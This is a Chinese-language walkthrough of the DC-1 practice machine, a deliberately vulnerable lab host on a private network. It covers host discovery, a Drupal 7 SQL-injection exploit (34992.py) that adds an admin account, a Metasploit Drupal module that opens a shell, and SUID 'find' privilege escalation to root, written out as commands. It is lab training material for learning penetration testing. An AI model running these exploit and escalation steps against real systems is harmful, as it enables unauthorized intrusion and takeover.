kali攻击机ip:192.168.10.87
dc-1靶机ip:192.168.10.72
一:信息收集
1.扫描该网段存活主机
这里有很多主机,怎么辨别我们的靶机呢?查看主机靶机的mac地址与扫描到的主机对应即可得到靶机ip
2.扫描靶机信息,可以看到靶机开启了ssh
3.登录上去看看查下 drupal 7
searchsploit drupal 7 发现存在sql注入 添加用户名和密码
python2.7 34992.py
添加一个用户名ms,密码al 的用户
python2.7 34992.py -t http://192.168.10.72 -u ms -p al
顺利在网页上登录
进去看了下没啥可利用的
二:拿到shell
1.利用msfconsole搜索drupal
search drupal
2.先查看信息设置RHOST最后利用模块1获取shell
show options
set RHOST 192.168.10.72
3.运行获取shell
use 1
run
4.交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
三:提权
查看u=s位的文件
find / -perm -u=s -type f 2>/dev/null
直接拿到root权限
find . -exec /bin/sh \; -quit
查看root下面的文件信息,直接拿到最终flag